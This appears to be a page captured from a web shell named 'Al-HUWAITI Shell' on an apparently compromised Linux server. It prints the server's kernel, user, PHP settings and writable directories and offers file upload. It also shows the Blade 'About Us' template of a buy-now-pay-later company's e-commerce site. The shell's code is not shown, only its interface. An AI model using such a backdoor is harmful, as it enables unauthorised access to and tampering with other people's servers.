Al-HUWAITI Shell
Al-huwaiti


Server : nginx/1.18.0
System : Linux localhost 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64
User : www-data ( 33)
PHP Version : 8.0.16
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /var/www/ecommerce/resources/views/website/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/ecommerce/resources/views/website/about.blade.php
@extends('website.partials.main')
@section('title', 'About Us')

@section('contents')
    <div class="banner position-relative"
        style="background: linear-gradient(68.48deg, #FBFAEE 46.63%, rgba(251, 250, 238, 0) 91.96%);  padding-top: 60px;">
        <div style="">
            <div class="container">
                <div class="row">
                    <div class="col-sm-7" style="z-index: 2">
                        <h1 class="text-e-primary font-weight-bold" style="font-size: 72px;">Your Plug</h1>
                        <h2 class="font-weight-bold" style="font-size: 54px;">For Asset Aquisition.</h2>
                        <h6 class="mb-4 font-px-22 font-weight-normal" style="line-height: 32px">
                            EtiqaFinans collaborates with prominent online and offline shops.<br />
                            Brands and asset brokers to provide short-term payment plans<br />
                            that allows you to make a purchase and pay for it later<br />
                            with no hidden charges and zero interest rate costs
                        </h6>
                        <div class="mb-4">
                            <a href="#" class="btn btn-success btn-lg mr-4">Get Started</a>
                            <a href="#" class="text-e-primary">Learn More <span class="ti-angle-right"></span></a>
                        </div>

                        <div class="py-4 d-flex align-items-center">
                            <span class="font-weight-bold pr-2">40%</span><span class="font-px-14 pr-4">Increase in Average
                                Order Value</span>
                            <span class="font-weight-bold pr-2">35%</span><span class="font-px-14">Increase in
                                Conversion</span>
                        </div>
                    </div>

                    <div class="col-sm-5 text-right">
                        <img src="frontend/img/house.png" class="img-fluid" />
                    </div>
                </div>
            </div>
        </div>
        <div class="rect"></div>
    </div>


    <div class="website-section savings-based-finance">
        <div class="container">

            <div class="row">
                <div class="col-sm-6 font-px-19 d-none d-sm-block">
                    <svg viewBox="0 0 575 674" fill="none" xmlns="http://www.w3.org/2000/svg" width="" height="374">
                        <rect width="316" height="315" rx="18" fill="#FFCC4D"></rect>
                        <rect width="265" height="264" rx="18" transform="matrix(-1 0 0 1 564 410)" fill="#f9ebc7"></rect>
                        <rect x="340" y="150" width="235" height="235" rx="18" fill="#03D675"></rect>
                        <rect width="235" height="235" rx="18" transform="matrix(-1 0 0 1 275 340)" fill="#DDFFEF"></rect>
                    </svg>
                </div>

                <div class="col-sm-6 font-px-19">
                    <div class="section-head">
                        <h5 style="color:#FFCC4D;">Easy Payback <span class="pl-2 fire-svg">{!! svg_html('fire') !!}</span>
                        </h5>
                        <h3>Our Story</h3>
                    </div>

                    <div>
                        <b>EtiqaFinans Limited</b> is a company whose mission is to ensure ease in the acquisition of goods and properties through the interest-free Buy Now Pay Later (BNPL) and Organized Group Mutual Ownership (OGMO).
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div class="website-section savings-based-finance position-relative">
        <div style="background: linear-gradient(186.41deg, rgba(3, 214, 117, 0) 10.84%, rgba(3, 214, 117, 0.667604) 94.15%, #03D675 118.98%);opacity: 0.16; position: absolute;left: 0; top: 0; width: 100%; height: 100%;">
        </div>
        <div class="container">

            <div class="row">
                <div class="col-sm-12 text-center section-head">
                    <h5 style="color:#FFCC4D;">The Backbone <span class="pl-2 fire-svg">{!! svg_html('fire') !!}</span></h5>
                    <h3 id="team">Our Team</h3>
                </div>
            </div>

            <div class="row">

                @foreach($teams as $team)
                    <div class="col-sm-4 mb-4 aos-init aos-animate" data-aos="zoom-in" data-aos-delay="100">
                        <div class="member text-center">
                            <div class="rounded-circle mb-2 d-inline-block" style="background-image: url('assets/teams/{{ addslashes($team['image']) }}'); background-size: cover; background-repeat: no-repeat; @if($team['name'] === 'Rashed Jahangir') background-position: center; @endif width: 200px; height: 200px;"></div>
                            <div class="member-info">
                                <div class="member-info-content">
                                    <h4>{{ $team['name'] }}</h4>
                                    <span class="text-e-primary">{{ $team['position'] ?: 'Unknown Position' }}</span>
                                </div>
                                <div class="social">
                                    <a href=""><i class="mdi mdi-twitter"></i></a>
                                    <a href=""><i class="mdi mdi-facebook"></i></a>
                                    <a href=""><i class="mdi mdi-instagram"></i></a>
                                    <a href=""><i class="mdi mdi-linkedin"></i></a>
                                </div>
                            </div>
                        </div>
                    </div>

                    @if ($loop->iteration % 3 === 0)
                        </div><div class="row">
                    @endif

                @endforeach

            </div>

        </div>

        <div class="container mt-5">

            <div class="row">
                <div class="col-sm-12 text-center section-head">
                    <h3 id="team">Our Advisers</h3>
                </div>
            </div>

            <div class="row">

                @foreach($advisers as $team)
                    <div class="col-sm-4 mb-4 aos-init aos-animate" data-aos="zoom-in" data-aos-delay="100">
                        <div class="member text-center">
                            <div class="rounded-circle mb-2 d-inline-block" style="background-image: url('assets/teams/{{ addslashes($team['image']) }}'); background-size: cover; background-repeat: no-repeat; @if($team['name'] === 'Rashed Jahangir') background-position: center; @endif width: 200px; height: 200px;"></div>
                            <div class="member-info">
                                <div class="member-info-content">
                                    <h4>{{ $team['name'] }}</h4>
                                    <span class="text-e-primary">{{ $team['position'] ?: 'Unknown Position' }}</span>
                                </div>
                                <div class="social">
                                    <a href=""><i class="mdi mdi-twitter"></i></a>
                                    <a href=""><i class="mdi mdi-facebook"></i></a>
                                    <a href=""><i class="mdi mdi-instagram"></i></a>
                                    <a href=""><i class="mdi mdi-linkedin"></i></a>
                                </div>
                            </div>
                        </div>
                    </div>

                    @if ($loop->iteration % 3 === 0)
                        </div><div class="row">
                    @endif

                @endforeach

            </div>

            <div class="row">
                <div class="col-sm-12 text-center">
                    <div class="my-4">We take the risk for you, we connect you with suitable asset circle for owning desired assets. Enjoy the happy future you desire</div>
                    <div><a href="{{ route('website.join-career') }}" class="btn btn-lg btn-success">Join Our Careers</a></div>
                </div>
            </div>
        </div>
    </div>


    <div class="website-section savings-based-finance">
        <div class="container">

            <div class="row">
                <div class="col-sm-12 text-left section-head mb-2">
                    <h5 style="color:#FFCC4D;">Drive Growth <span class="pl-2 fire-svg">{!! svg_html('fire') !!}</span></h5>
                    <h3 id="partner">Our Partners</h3>
                </div>
            </div>

            <div id="carousel_vendor" class="carousel slide" data-ride="carousel">
                <div class="carousel-inner">
                    <div class="carousel-item active">
                        <div class="row">
                            @foreach ($vendors as $vendor)
                                <div class="col-sm-2 mb-4">
                                    <div class="d-flex position-relative" style="height: 120px">
                                        <a
                                            target="_blank"
                                            href="https://{{ $vendor['url'] }}"
                                            class="text-center vertical-center horizontal-center"
                                        >
                                            {{-- <h6 class="text-center">{{ $vendor['title'] }}</h6> --}}
                                            <img
                                                style="max-height: 120px;"
                                                src="{{ $vendor['image'] ?: 'images/hello-icon-128.png' }}"
                                                class="img-fluid" />
                                        </a>
                                    </div>
                                </div>
                                @if ($loop->iteration % 6 === 0)
                                    </div></div><div class="carousel-item"><div class="row">
                                @endif
                            @endforeach
                        </div>
                    </div>

                    <a class="carousel-control-prev" href="#carousel_vendor" role="button" data-slide="prev">
                        <span class="ti-angle-left text-e-primary font-px-22" aria-hidden="true"></span>
                        <span class="sr-only">Previous</span>
                    </a>
                    <a class="carousel-control-next" href="#carousel_vendor" role="button" data-slide="next">
                        <span class="ti-angle-right text-e-primary font-px-22" aria-hidden="true"></span>
                        <span class="sr-only">Next</span>
                    </a>
                </div>
            </div>

        </div>

    </div>

@endsection

Al-HUWAITI Shell